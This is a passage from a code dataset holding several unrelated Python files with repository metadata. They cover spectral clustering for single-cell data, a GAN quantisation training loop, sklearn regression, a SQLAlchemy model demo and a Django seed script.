KMeans\nfrom sklearn.neighbors import NearestNeighbors\n\nfrom typing import Tuple\nfrom typing import List\n\n\ndef rbf_neighbor_graph(\n X: np.ndarray,\n adaptive: bool = True,\n k: int = 30,\n a: int = 10,\n) -> csr_matrix:\n \"\"\"\n Construct a symmetric nearest neighbor graph with weights obtained \n using a Gaussian radial basis function (rbf) kernel.\n \n Arguments:\n X : np.ndarray of shape n_cells by n_features to obtain pairwise\n distances from\n adaptive : bool specifying whether to use an adaptive or global width\n in the rbf kernel\n k : int specifying the number of neighbors to use in the graph\n a : int specifying how to set the width for the rbf. When adaptive is\n True this parameter sets the width to the distance to the ath\n nearest neighbor. When adaptive is False the width is set to the \n ath percentile of nearest neighbor distances.\n \n Returns: \n 0.5 * (G + G.T) : The symmetric adjacency graph stored as a csr_matrix\n \n \"\"\"\n \n kNN = NearestNeighbors(n_neighbors = k, metric=\"minkowski\", p = 2)\n kNN.fit(X)\n G = kNN.kneighbors_graph(mode = \"distance\")\n \n if(adaptive):\n sigma = np.zeros(X.shape[0])\n for i in range(X.shape[0]):\n sigma[i] = np.sort(G.getrow(i).data)[a - 1]\n indptr = G.indptr\n for i in range(X.shape[0]):\n G.data[indptr[i]: indptr[i + 1]] = np.exp( - (G.data[indptr[i]: indptr[i + 1]] / sigma[i]) ** 2)\n \n else:\n sigma = np.percentile(G.data, a)\n G.data = np.exp(- (G.data / sigma) ** 2)\n \n return 0.5 * (G + G.T)\n \n \ndef reorder_clusters(\n cl: np.array\n) -> np.array:\n \"\"\"\n Reorder cluster labels by size\n \n Arguments:\n cl : Numpy array containing cluster labels for each cell\n \n Returns:\n cl_reorder : Integer cluster labels for the cells ordered\n by decreasing cluster size\n \n \"\"\"\n \n clust_size = {}\n clust_size = {c:0 for c in np.unique(cl)}\n for label in cl:\n clust_size[label] += 1\n \n clust_sort = sorted(clust_size.items(), key = lambda x: x[1], reverse = True) \n conversion_dict = {label[0]: i for i, label in enumerate(clust_sort)}\n \n cl_reorder = cl.copy()\n for i, label in enumerate(cl):\n cl_reorder[i] = conversion_dict[label]\n \n return cl_reorder\n\n\ndef sparse_spectral(\n A: csr_matrix,\n n_clust: int,\n random_state: int = 12345678,\n) -> Tuple[csr_matrix, np.ndarray, np.ndarray]:\n \"\"\"\n Spectral decomposition for a sparse adjacency matrix A.\n \n Arguments:\n A : The sparse adjacency matrix\n n_clust : the number of eigenvalues and corresponding eigenvectors\n to return\n \n Returns:\n L : The symmetric graph Laplacian\n eig_vals : The first n_clust eigenvalues of the symmetric graph \n Laplacian\n eig_vecs : The first n_clust eigenvectors of the symmetric graph \n Laplacian\n \n \"\"\"\n v0 = np.random.default_rng(random_state).uniform(-1, 1, size = A.shape[0])\n \n D = diags(np.array(A.sum(axis=1))[:,0]).tocsr()\n D1_2 = D.sqrt().power(-1)\n \n L = D1_2 * (D - A) * D1_2\n \n eig_vals, eig_vecs = eigsh(L, k=n_clust, which=\"SM\", v0 = v0)\n \n return L, eig_vals, eig_vecs\n\n\ndef spectral_clustering(\n eig_vecs: np.ndarray,\n n_clust: int,\n random_state: int = 12345678,\n) -> np.ndarray:\n \"\"\"\n Perform k-means clustering given an eigenvector embedding.\n \n Arguments:\n eig_vecs : The eigenvector embedding matrix. Each column gives an\n eigenvector sorted in ascending order by eigenvalue\n n_clust : The number of clusters to partition the data. This also \n specifies the number of eigenvectors to use for the embedding.\n random_state : A random state to use for initializing the k-means\n search\n \n Returns:\n cluster_labels : The cluster labels for each cell. Each cluster is \n assigned an integer label and these labels are sorted in descending\n order by cluster size\n \n \"\"\"\n \n vecs_norm = eig_vecs[:, :n_clust] / np.linalg.norm(eig_vecs[:, :n_clust], axis = 1, keepdims = True)\n \n cluster_labels = KMeans(n_clusters = n_clust,\n max_iter = 1000,\n n_init = 100,\n random_state = random_state).fit_predict(vecs_norm)\n \n return reorder_clusters(cluster_labels)\n\n\ndef scml(\n graphs: List[csr_matrix],\n n_clust: int,\n device: torch.device,\n alpha: float = 0.1,\n random_state: int = 12345678,\n) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"\n Perform the spectral clustering on multilayer graphs for a list of graph\n adjacency matrices.\n \n Arguments:\n graphs : A list of sparse csr_matrix corresponding to the graph\n adjacency matrices.\n n_clust : The number of clusters to use for clustering\n device : A PyTorch device to use for obtaining the nearest neighbors\n alpha : A weight to use for the penalty term for the distances to the\n individual subspaces\n \n Returns:\n vals_scml : The eigenvalues of the scml matrix\n vecs_scml : The eigenvectors of the scml matrix (as the columns)\n cluster_labels : The scml cluster labels for each cell\n \n \"\"\"\n \n L, eig_vals, eig_vecs = sparse_spectral(graphs[0], n_clust, random_state)\n L_scml = L.toarray() - alpha * (eig_vecs @ eig_vecs.T)\n \n for G in graphs[1:]:\n L, eig_vals, eig_vecs = sparse_spectral(G, n_clust, random_state)\n L_scml += (L.toarray() - alpha * (eig_vecs @ eig_vecs.T))\n \n L_scml = torch.from_numpy(L_scml).to(device)\n vals_scml, vecs_scml = torch.linalg.eigh(L_scml)\n \n vals_scml = vals_scml.cpu().numpy()\n vecs_scml = vecs_scml.cpu().numpy()\n \n cluster_labels = spectral_clustering(vecs_scml, n_clust, random_state)\n \n return vals_scml, vecs_scml, cluster_labels\n\n\ndef full_spectral(\n A: csr_matrix,\n device: torch.device,\n) -> Tuple[torch.tensor, torch.tensor, torch.tensor]:\n \"\"\"\n Spectral decomposition for a sparse adjacency matrix A.\n \n Arguments:\n A : The sparse adjacency matrix\n n_clust : The number of eigenvalues and corresponding eigenvectors\n to return\n Returns:\n L : The symmetric graph Laplacian stored as a PyTorch tensor object\n eig_vals : The eigenvalues of the symmetric graph Laplacian\n eig_vecs : The eigenvectors of the symmetric graph Laplacian\n \n \"\"\"\n \n D = diags(np.array(A.sum(axis=1))[:,0]).tocsr()\n D1_2 = D.sqrt().power(-1)\n \n L = D1_2 * (D - A) * D1_2\n L = torch.from_numpy(L.toarray()).to(device)\n \n eig_vals, eig_vecs = torch.linalg.eigh(L)\n \n return L, eig_vals, eig_vecs\n \n\ndef density_matrix(\n eig_vals: torch.Tensor,\n eig_vecs: torch.Tensor,\n beta: float,\n) -> torch.Tensor:\n \"\"\"\n Construct the density matrix from the spectrum and corresponding\n eigenvectors of the symmetric graph Laplacian.\n \n Arguments:\n eig_vals : Eigenvalues of the symmetric graph Laplacian\n eig_vecs : Eigenvectors of the symmetric graph Laplacian\n beta : Inverse temperature parameter. Larger values will suppress\n the contribution of eigenvector directions with larger eigenvalues\n \n Returns:\n rho / Z : The density matrix\n \n \"\"\"\n\n P = torch.exp(-beta * eig_vals)\n rho = eig_vecs * P\n rho = rho @ eig_vecs.T\n Z = torch.trace(rho)\n \n return rho / Z\n\n \ndef soft_scml(\n graphs: List[csr_matrix],\n n_clust: int,\n device: torch.device,\n alpha: float = 0.1,\n beta: float = None,\n random_state: int = 12345678,\n) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"\n Perform the soft scml embedding and clustering.\n \n Arguments:\n graphs : A list of sparse csr_matrix corresponding to the graph\n adjacency matrices.\n n_clust : The number of clusters to use for clustering\n device : A PyTorch device to use for obtaining the nearest neighbors\n alpha : A weight to use for the penalty term for the distances to the\n individual subspaces\n beta : Inverse temperature parameter. Larger values will suppress\n the contribution of eigenvector directions with larger eigenvalues\n random_state : A random state to use for initializing the k-means\n search\n \n Returns:\n vals_scml : The eigenvalues of the soft scml matrix\n vecs_scml : The eigenvectors of the soft scml matrix (as the columns)\n cluster_labels : The soft scml cluster labels for each cell\n \n \"\"\"\n \n N = graphs[0].shape[0]\n if beta is None:\n beta = np.sqrt(N)\n \n L_scml, eig_vals, eig_vecs = full_spectral(graphs[0], device)\n rho = density_matrix(eig_vals, eig_vecs, beta)\n del eig_vecs, eig_vals\n L_scml -= alpha * rho\n del rho\n \n for G in graphs[1:]:\n L, eig_vals, eig_vecs = full_spectral(G, device)\n L_scml += L\n del L\n rho = density_matrix(eig_vals, eig_vecs, beta)\n del eig_vecs, eig_vals\n L_scml -= alpha * rho\n del rho\n \n vals_scml, vecs_scml = torch.linalg.eigh(L_scml)\n del L_scml\n vals_scml = vals_scml.cpu().numpy()\n vecs_scml = vecs_scml.cpu().numpy()\n \n cluster_labels = spectral_clustering(vecs_scml, n_clust, random_state)\n \n return vals_scml, vecs_scml, cluster_labels\n\n\n\n \n ", "repo_name": "jssong-lab/sc-spectrum", "sub_path": "src/sc_spectrum/scml.py", "file_name": "scml.py", "file_ext": "py", "file_size_in_byte": 9933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.ndarray", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 57, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "attribute"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 93, "usage_type": "name"}, {"api_name": "numpy.random.default_rng", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "scipy.sparse.diags", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.eigsh", "line_number": 120, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 96, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 96, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 129, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 159, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 159, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 161, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.linalg.eigh", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.linalg", "line_number": 192, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 164, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 164, "usage_type": "attribute"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 203, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 204, "usage_type": "attribute"}, {"api_name": "scipy.sparse.diags", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 220, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 224, "usage_type": "call"}, {"api_name": "torch.linalg.eigh", "line_number": 226, "usage_type": "call"}, {"api_name": "torch.linalg", "line_number": 226, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 205, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 205, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 232, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 233, "usage_type": "attribute"}, {"api_name": "torch.exp", "line_number": 251, "usage_type": "call"}, {"api_name": "torch.trace", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 235, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 260, "usage_type": "name"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 260, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 262, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.linalg.eigh", "line_number": 308, "usage_type": "call"}, {"api_name": "torch.linalg", "line_number": 308, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 266, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 266, "usage_type": "attribute"}]} +{"seq_id": "16144950800", "text": "import time\nfrom collections import OrderedDict\nfrom options.train_Q_options import TrainOptions\nfrom data.data_loader import CreateDataLoader\nfrom models.models import create_model\nimport util.util as util\nfrom util.visualizer import Visualizer\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport copy\nfrom torch.utils.tensorboard import SummaryWriter\nfrom sklearn.cluster import KMeans\nimport numpy as np\nimport torch.nn.functional as F\n\n\nopt = TrainOptions().parse()\niter_path = os.path.join(opt.checkpoints_dir, opt.name, 'iter.txt')\nintial_flag = True\nopt.model = 'Bpgan_GAN_Q'\nif opt.continue_train:\n try:\n start_epoch, epoch_iter = np.loadtxt(iter_path, delimiter=',', dtype=int)\n except:\n start_epoch, epoch_iter = 1, 0\n print('Resuming from epoch %d at iteration %d' % (start_epoch, epoch_iter))\n Temp = (opt.Q_final - opt.Q_init_Temp)/(opt.Q_hard_epoch-opt.Q_train_epoch) *(start_epoch-opt.Q_train_epoch)+opt.Q_init_Temp\n if start_epoch >= opt.Q_train_epoch:\n intial_flag = False\nelse:\n start_epoch, epoch_iter = 1, 0\nif opt.debug:\n opt.batchSize=2\n opt.display_freq = 1\n opt.print_freq = 1\n opt.niter = 100\n opt.niter_decay = 50\n opt.max_dataset_size = 10\ndata_loader = CreateDataLoader(opt)\ndataset = data_loader.load_data()\ndataset_size = len(data_loader)\nprint('#training images = %d' % dataset_size)\n\nmodel = create_model(opt)\nvisualizer = Visualizer(opt)\nsummary_path = os.path.join(opt.checkpoints_dir,opt.name,'logs/')\nwritter = SummaryWriter(log_dir=summary_path)\ntotal_steps = (start_epoch - 1) * dataset_size + epoch_iter\nrandom_index = 20\n\nimtype = np.uint8 if opt.image_bit_num==8 else np.uint16\n\n\ndef train(data, epoch, total_steps, epoch_iter, Q_type):\n iter_start_time = time.time()\n total_steps += opt.batchSize\n epoch_iter += opt.batchSize\n\n # whether to collect output images\n save_fake = total_steps % opt.display_freq == 0\n\n ############## Forward Pass ######################\n fake_image = model(Variable(data['label']), Q_type=Q_type)\n real_image = data['image'].cuda()\n\n loss_D_fake = 0\n loss_D_real = 0\n loss_G_GAN = 0\n\n model.module.optimizer_G.zero_grad()\n criterionGAN = nn.BCEWithLogitsLoss()\n if not opt.no_gan_loss:\n model.module.optimizer_D.zero_grad()\n\n # Fake Detection and Loss\n pred_fake_pool = model.module.discriminate(fake_image)[0][0]\n #loss_D_fake = opt.lambda_gan * F.relu(1.0 + pred_fake_pool).mean()#self.criterionGAN(pred_fake_pool, False) \n loss_D_fake = opt.lambda_gan * criterionGAN(pred_fake_pool, torch.zeros_like(pred_fake_pool))\n\n # Real Detection and Loss \n pred_real = model.module.discriminate(real_image)[0][0]\n #loss_D_real = opt.lambda_gan * F.relu(1.0 - pred_real).mean()\n loss_D_real = opt.lambda_gan * criterionGAN(pred_real, torch.ones_like(pred_real))\n\n loss_D = loss_D_fake + loss_D_real\n loss_D.backward()\n\n model.module.optimizer_D.step()\n\n # GAN loss (Fake Passability Loss) \n pred_fake = model.module.netD.forward(fake_image)[0][0]\n #loss_G_GAN = - opt.lambda_gan * pred_fake.mean()\n loss_G_GAN = opt.lambda_gan * criterionGAN(pred_fake, torch.ones_like(pred_fake))\n \n # GAN feature matching loss\n loss_G_GAN_Feat = 0\n if not opt.no_gan_loss and not opt.no_ganFeat_loss:\n pass\n \"\"\"\n feat_weights = 4.0 / (self.opt.n_layers_D + 1)\n D_weights = 1.0 / self.opt.num_D\n for i in range(self.opt.num_D):\n for j in range(len(pred_fake[i])-1):\n loss_G_GAN_Feat += D_weights * feat_weights * \\\n self.criterionFeat(pred_fake[i][j], pred_real[i][j].detach()) * self.opt.lambda_feat\n \"\"\"\n \n # VGG feature matching loss\n loss_G_VGG = 0\n if not opt.no_vgg_loss:\n loss_G_VGG = model.module.criterionVGG(fake_image, real_image) * opt.lambda_feat\n loss_mse = 0\n if not opt.no_mse_loss:\n loss_mse = model.module.criterion_mse(fake_image,real_image) * opt.lambda_mse\n \n\n loss_G = loss_G_GAN + loss_G_GAN_Feat + loss_G_VGG + loss_mse\n \n ############### Backward Pass ####################\n # update generator weights\n loss_G.backward()\n model.module.optimizer_G.step()\n\n loss_dict = {'D_fake': loss_D_fake,\n 'D_real': loss_D_real,\n 'G_GAN': loss_G_GAN,\n 'G_GAN_Feat': loss_G_GAN_Feat,\n 'Feature': loss_G_VGG,\n 'MSE_Loss': loss_mse\n }\n\n ############## Display results and errors ##########\n ### print out errors\n if total_steps % opt.print_freq == 0:\n errors = {k: v.data.item() if not isinstance(v, int) else v for k, v in loss_dict.items()}\n t = (time.time() - iter_start_time) / opt.batchSize\n visualizer.print_current_errors(epoch, epoch_iter, errors, t)\n #visualizer.plot_current_errors(errors, total_steps)\n ### display output images\n if save_fake:\n visuals = OrderedDict([('input_label', util.tensor2label(data['label'][0], 0, imtype)),\n ('synthesized_image', util.tensor2im(fake_image.data[0], imtype))])\n visualizer.display_current_results(visuals, epoch, total_steps)\n\n ### save latest model\n if total_steps % opt.save_latest_freq == 0:\n print('saving the latest model (epoch %d, total_steps %d)' % (epoch, total_steps))\n model.module.save('latest')\n np.savetxt(iter_path, (epoch, epoch_iter), delimiter=',', fmt='%d')\n\n return total_steps, epoch_iter\n\n\nfor epoch in range(start_epoch, opt.niter + opt.niter_decay + 1):\n epoch_start_time = time.time()\n if epoch != start_epoch:\n epoch_iter = epoch_iter % dataset_size\n if epoch < opt.Q_train_epoch:\n for i, data in enumerate(dataset, start=epoch_iter):\n total_steps, epoch_iter = train(data, epoch, total_steps, epoch_iter, \"None\")\n\n elif epoch >= opt.Q_train_epoch and epoch < opt.Q_hard_epoch:\n if epoch == opt.Q_train_epoch:\n model.module.save('floating_final')\n if intial_flag:\n intial_flag = False\n\n center = torch.linspace(0, 1, opt.n_cluster).cuda()\n model.module.update_center(center)\n model.module.netE.train()\n for i, data in enumerate(dataset, start=epoch_iter):\n total_steps, epoch_iter = train(data, epoch, total_steps, epoch_iter, \"Soft\")\n else:\n if epoch == opt.Q_hard_epoch:\n model.module.save('Q_soft')\n model.module.netE.train()\n for i, data in enumerate(dataset, start=epoch_iter):\n total_steps, epoch_iter = train(data, epoch, total_steps, epoch_iter, \"Hard\")\n \n # end of epoch\n iter_end_time = time.time()\n print('End of epoch %d / %d \\t Time Taken: %d sec' %\n (epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))\n ### save model for this epoch\n if epoch % opt.save_epoch_freq == 0:\n print('saving the model at the end of epoch %d, iters %d' % (epoch, total_steps))\n model.module.save('latest')\n model.module.save(epoch)\n np.savetxt(iter_path, (epoch + 1, 0), delimiter=',', fmt='%d')\n\n ### linearly decay learning rate after certain iterations\n #if epoch > opt.niter:\n # model.module.update_learning_rate()\n if epoch % 100 == 0:\n model.module.update_learning_rate_custom()\n if epoch >= opt.Q_train_epoch and epoch < opt.Q_hard_epoch:\n Temp = (opt.Q_final - opt.Q_init_Temp) / (opt.Q_hard_epoch - opt.Q_train_epoch) * (\n epoch - opt.Q_train_epoch) + opt.Q_init_Temp\n model.module.update_Temp(Temp)\n print('Temp is %f'%(Temp))\nwritter.close()\n", "repo_name": "BowenL0218/BPGAN_Light_Weight", "sub_path": "train_Q.py", "file_name": "train_Q.py", "file_ext": "py", "file_size_in_byte": 7871, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "options.train_Q_options.TrainOptions", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 26, "usage_type": "call"}, {"api_name": "data.data_loader.CreateDataLoader", "line_number": 42, "usage_type": "call"}, {"api_name": "models.models.create_model", "line_number": 47, "usage_type": "call"}, {"api_name": "util.visualizer.Visualizer", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 54, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 66, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 66, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.BCEWithLogitsLoss", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.zeros_like", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 96, "usage_type": "call"}, {"api_name": "time.time", "line_number": 139, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 144, "usage_type": "call"}, {"api_name": "util.util.tensor2label", "line_number": 144, "usage_type": "call"}, {"api_name": "util.util", "line_number": 144, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 144, "usage_type": "name"}, {"api_name": "util.util.tensor2im", "line_number": 145, "usage_type": "call"}, {"api_name": "util.util", "line_number": 145, "usage_type": "name"}, {"api_name": "numpy.savetxt", "line_number": 152, "usage_type": "call"}, {"api_name": "time.time", "line_number": 158, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 162, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 163, "usage_type": "argument"}, {"api_name": "torch.linspace", "line_number": 171, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 174, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 175, "usage_type": "argument"}, {"api_name": "data.data_loader", "line_number": 180, "usage_type": "name"}, {"api_name": "data.data_loader", "line_number": 181, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 184, "usage_type": "call"}, {"api_name": "time.time", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "26141203307", "text": "import pandas as pd\nimport numpy as np\nfrom dataHandler import DataLoader\nfrom sklearn.multioutput import MultiOutputRegressor\nfrom sklearn.linear_model import Ridge, LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\n\ndef linear(X,X_,y,y_):\n clf = Ridge(normalize=True).fit(X, y)\n pred = np.array(clf.predict(X_))\n pred = np.around(pred, 1).tolist()\n print(pred[:20])\n print(np.around(y_.values[:20], 1).tolist())\n print(clf.score(X_, y_))\n\n reg = LinearRegression(normalize=True).fit(X,y)\n lpred = np.array(reg.predict(X_))\n lpred = np.around(lpred, 1).tolist()\n print(lpred[:20])\n print(np.around(y_.values[:20], 1).tolist())\n print(reg.score(X_, y_))\n\n\ndef randomForest(X,y):\n max_depth = 25\n regr_multirf = MultiOutputRegressor(RandomForestRegressor(n_estimators=100, max_depth=max_depth, random_state=45))\n clf = regr_multirf.fit(X,y)\n return clf\n\n\nif __name__ == '__main__':\n dl = DataLoader()\n dl.load(\"datasets/train.csv\")\n X, X_, y, y_ = dl.split()\n dl.process()\n reg = randomForest(X,y)\n tdl = DataLoader()\n tdl.load(\"datasets/test.csv\",isTest=True)\n tdl.process()\n pred = np.array( reg.predict(tdl.sensor))\n date = tdl.dataset.date_time.to_numpy().reshape(-1,1)\n data = np.concatenate((date,pred),axis=1)\n result = pd.DataFrame(data,columns=[\"date_time\",\"target_carbon_monoxide\",\"target_benzene\",\"target_nitrogen_oxides\"])\n result.to_csv(\"datasets/result.csv\",index=False)\n\n", "repo_name": "RJRL12138/Regression-Examples", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sklearn.linear_model.Ridge", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.multioutput.MultiOutputRegressor", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 26, "usage_type": "call"}, {"api_name": "dataHandler.DataLoader", "line_number": 32, "usage_type": "call"}, {"api_name": "dataHandler.DataLoader", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "2568870677", "text": "from sqlalchemy import create_engine, Column, Integer, String, or_, and_, not_, desc, asc\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('sqlite:///final.db', echo=True)\n# create_engine('postgresql:///dakshbindal:123@localhost:5432/python_test')\nSession = sessionmaker(bind=engine)\nsession = Session()\nBase = declarative_base()\n\n\nclass User(Base):\n __tablename__ = 'users'\n id = Column(Integer, primary_key=True)\n name = Column(String)\n fullname = Column(String)\n lastname = Column(String)\n\n def __repr__(self):\n return \"<User(name='%s', fullname='%s', lastname='%s')>\" % (self.name, self.fullname, self.lastname)\n\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)\n\n# user_a = User(name=\"hello\", fullname=\"Daksh\", lastname=\"Bindal\")\n# session.add(user_a)\n# session.commit()\n# session.close()\n\n# rows=session.query(User).get(1)\n# rows_where=session.query(User).filter(User.name == 'hello')\n# print(rows)\n# print(session.query(User).filter(or_(User.name == 'hello', User.lastname.ilike('a%'))).all())\nprint(session.query(User).order_by(desc(User.id)).all())", "repo_name": "Rashi-Gupta-2000/Python_DB_Innogeeks", "sub_path": "Alchemy/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 5, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 7, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 14, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 17, "usage_type": "argument"}, {"api_name": "sqlalchemy.desc", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "13408061410", "text": "import uuid\nfrom faker import Faker\nfrom django.conf import settings\nfrom sotinyurl.tinyurls.models import TinyUrl\nfrom django.utils.timezone import now\nfrom django.contrib.auth import get_user_model\n\nUser = get_user_model()\n\ntiny = TinyUrl()\nfake = Faker()\nenv_name = settings.ENV_NAME or None\n\nif env_name == \"local\" and not User.objects.filter(username=\"admin\").exists():\n print (\"Create local superuser\")\n User.objects.create_superuser(\n username=\"admin\",\n email=\"admin@example.com\",\n password=\"admin\"\n )\n\nprint (\"Create Random Tiny Urls\")\nbulk_list = [\n TinyUrl(\n tiny_url=tiny._TinyUrl__generate_random_tiny_url(),\n redirect_to=fake.url(),\n created_at=now(),\n updated_at=now(),\n id=uuid.uuid4()\n )\n for x in range(10000)\n]\nTinyUrl.objects.bulk_create(bulk_list)\n", "repo_name": "michal-stachura/example-tinyurlapp", "sub_path": "sotinyurl/utils/seed.py", "file_name": "seed.py", "file_ext": "py", "file_size_in_byte": 842, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 8, "usage_type": "call"}, {"api_name": "sotinyurl.tinyurls.models.TinyUrl", "line_number": 10, "usage_type": "call"}, {"api_name": "faker.Faker", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.settings.ENV_NAME", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "sotinyurl.tinyurls.models.TinyUrl", "line_number": 24, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 27, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 28, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 29, "usage_type": "call"}, {"api_name": 